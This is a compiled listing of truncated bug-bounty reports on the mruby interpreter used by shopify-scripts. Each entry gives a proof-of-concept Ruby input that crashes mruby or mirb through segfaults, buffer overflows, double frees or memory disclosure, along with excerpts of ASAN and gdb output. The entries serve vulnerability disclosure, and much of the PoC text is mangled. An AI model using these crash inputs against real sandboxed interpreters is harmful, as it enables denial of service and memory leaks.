shopify-scripts: SEGV on ary_concat

The following input demonstrates a crash: def z return begin 0.each do return end rescue = x ensure x.backtrace end end z ASAN report ./mruby/bin/mruby asd.rb ASAN:DEADLYSIGNAL ================================================================= ==43761==ERROR: AddressSanitizer: SEGV on unknown...

shopify-scripts: heap-buffer-overflow in OP_R_BREAK

The following input demonstrates a crash: def z e Array = a rescue lambda yield end z break Array ASAN report: ./mruby/bin/mirb 2084out.rb mirb - Embeddable Interactive Ruby Shell = :z = nil mirb:6: undefined method 'e' for main NoMethodError = nil...

shopify-scripts: mirb only: stack-buffer-overflow (OOB write) in main()

Triggered in 7e28510 7 April 2017 with mirb only. cat test013.rb | mirb ==17976==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffeb477fb0 at pc 0x408c21 bp 0x7fffeb477a90 sp 0x7fffeb477a88 WRITE of size 1 at 0x7fffeb477fb0 thread T0 0 0x408c20 in main...

shopify-scripts: SIGSEGV in mrb_str_inum

PoC ------------------- The following code triggers the bug attached as testmrbstrinum.rb: def methodmissingfalse end def tostr""end Integerÿ,2.h Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb r Reading symbols from ./mirb...idone. gdb r testmrbstrinum.rb Starting...

shopify-scripts: SIGABRT - in free

PoC ------------------- The following code triggers the bug attached as free.rb: a= h=""=0 ha,"h00000000h000000=0000000 0000ht00000=00t0000 0000h000000=000000 00000"=0 a0="z" ha,"h00000000h000000=0000000 0000ht00000=00t0000 0000h000000=000000 00000"=0 h.dup Backtrace - mirb -------------------...

shopify-scripts: SIGSEGV in mrb_class

PoC ------------------- Attached as testmrbclass.rb: Debug - mirb ------------------- Program received signal SIGSEGV, Segmentation fault. 0x0000000000402ef2 in mrbclass mrb=0x6b0010, v=... at /home/x/Desktop/test/mruby/include/mruby/class.h:50 50 return mrbobjptrv-c; gdb l 45 case MRBTTCPTR: 46...

shopify-scripts: SIGSEGV in mrb_vm_exec

PoC ------------------- The following code triggers the bug attached as testmrbvmexec.rb: s=proc|f,g,x|fxgx.curry k=proc|x,y|x.curry i=proc|x|x.curry fi0= re0=proc|x|fi0.size;x.curry ssiiki0sskssksssksskskre0skskkksksk Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb...

shopify-scripts: SIGABRT - mirb - Double Free

PoC ------------------- Attached as test.rb Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb r Reading symbols from ./mirb...done. gdb r test.rb Starting program: /home/x/Desktop/test/mruby/bin/mirb test.rb mirb - Embeddable Interactive Ruby Shell NoMethodError: undefin...

shopify-scripts: SIGABRT - mirb and mruby

PoC ------------------- The following code triggers the bug attached as test.rb: def methodmissingm,e self.ff||=00end e Debug - mirb ------------------- x@x:/Desktop/test/mruby/bin$ gdb -q ./mirb Reading symbols from ./mirb...done. gdb r test.rb Starting program: /home/x/Desktop/test/mruby/bin/mi...

shopify-scripts: SIGSEGV in str_buf_cat

PoC ------------------- Attached as teststrbufcat.rb Debug - mirb ------------------- Program received signal SIGSEGV, Segmentation fault. memcpysse2unaligned at ../sysdeps/x8664/multiarch/memcpy-sse2-unaligned.S:36 36 ../sysdeps/x8664/multiarch/memcpy-sse2-unaligned.S: No such file or directory...

shopify-scripts: SIGABRT in only mirb

PoC ------------------- The following code triggers the bug attached as test.rb: def tostr 00end 0.times Debug - mirb ------------------- The program being debugged has been started already. Start it from the beginning? y or n y Starting program: /home/x/Desktop/test/mruby/bin/mirb test.rb mirb -...

shopify-scripts: SIGSEGV - mark_context_stack

PoC ------------------- The following code triggers the bug attached as testmarkcontextstack.rb: def one tooyieldend def too yield ensure onebreakend one Debug - mirb ------------------- Starting program: /home/x/Desktop/test/mruby/bin/mirb testmarkcontextstack mirb - Embeddable Interactive Ruby...

shopify-scripts: SIGABRT - method_missing - mark_context_stack

PoC ------------------- The following code triggers the bug attached as testmethodmissing.rb: def methodmissinge,0.n||=0 00end b Debug - mirb ------------------- gdb r testmethodmissing.rb Starting program: /home/x/Desktop/research/test/mruby/bin/mirb testmethodmissing.rb mirb - Embeddable...

shopify-scripts: SIGSEGV - mrb_vm_exec - line:1312

PoC ------------------- The following code triggers the bug attached as mrbvmexec.rb: n s s k h GC.start ObjectSpace.eachobject|obj|obj Debug - mirb ------------------- gdb r mrbvmexec.rb The program being debugged has been started already. Start it from the beginning? y or n y Starting program:...

shopify-scripts: SIGSEGV - vm.c - line:1214

PoC ------------------- The following code triggers the bug attached as testmrbvmexec1214.rb: def test instanceexec do return toenum:==end ensure end test Debug - mirb ------------------- gdb r testmrbvmexec1214.rb Starting program: /home/x/Desktop/research/3fuzz/mruby/bin/mirb testmrbvmexec1214....

shopify-scripts: SIGSEGV - mrb_obj_extend - line:413

PoC: ------------------- The following code triggers the bug attached as testmrbobjextend413.rb: module Test end def methodmissingsextendTestend def setva.set0end set0 Mirb - Debug: ------------------- gdb r testmrbobjextend413.rb The program being debugged has been started already. Start it from...

shopify-scripts: SIGSEGV - mrb_vm_exec - line:1681

PoC: ------------------- The following code triggers the bug attached as testmrbvmexec1681.rb: def try yield ensure yield end a=lambda do a.try do return end end.call Mirb - Debug: ------------------- gdb r testmrbvmexec1678.rb The program being debugged has been started already. Start it from th...

shopify-scripts: SIGSEGV - kh_resize_iv - Null Deref

PoC --------------------- The following code triggers the bug attached as khresizeiv.rb: l t'',''doend s'',''do.end d t''do.end a=Array.new a.=102,0 € s a.tos a a.tos a.i Debug - mirb --------------------- gdb r khresizeiv.rb Starting program: /home/x/Desktop/research/mruby/bin/mirb khresizeiv.rb...

shopify-scripts: SIGSEGV - mrb_check_intern_str() - NullPointer

PoC --------------------- The following code triggers the bug attached as mrbvmexec.rb: def tostr $s.replace""end $s="" class Test00espondTo end Test00espondTo.respondto?0 Crash - mirb --------------------- x@x:/Desktop/research/mruby/bin$ ./mirb mrbcheckinternstr.rb mirb - Embeddable Interactive...

shopify-scripts: Memory disclosure in timegm

An attacker may disclose memory or/and crash mirb. PoC ruby @a = '' for i in 0..50 do t = Time.new1970, 12 + i + 1.toi - Time.new1970, 12 + i.toi @a = 0..50 = nil = "28de80 28de80 263b80 28de80 278d00 28de80 278d00 28de80 28de80 278d00 28de80 278d00 28de80 49dab380 ee655600 feabe80 98ee00 9facec8...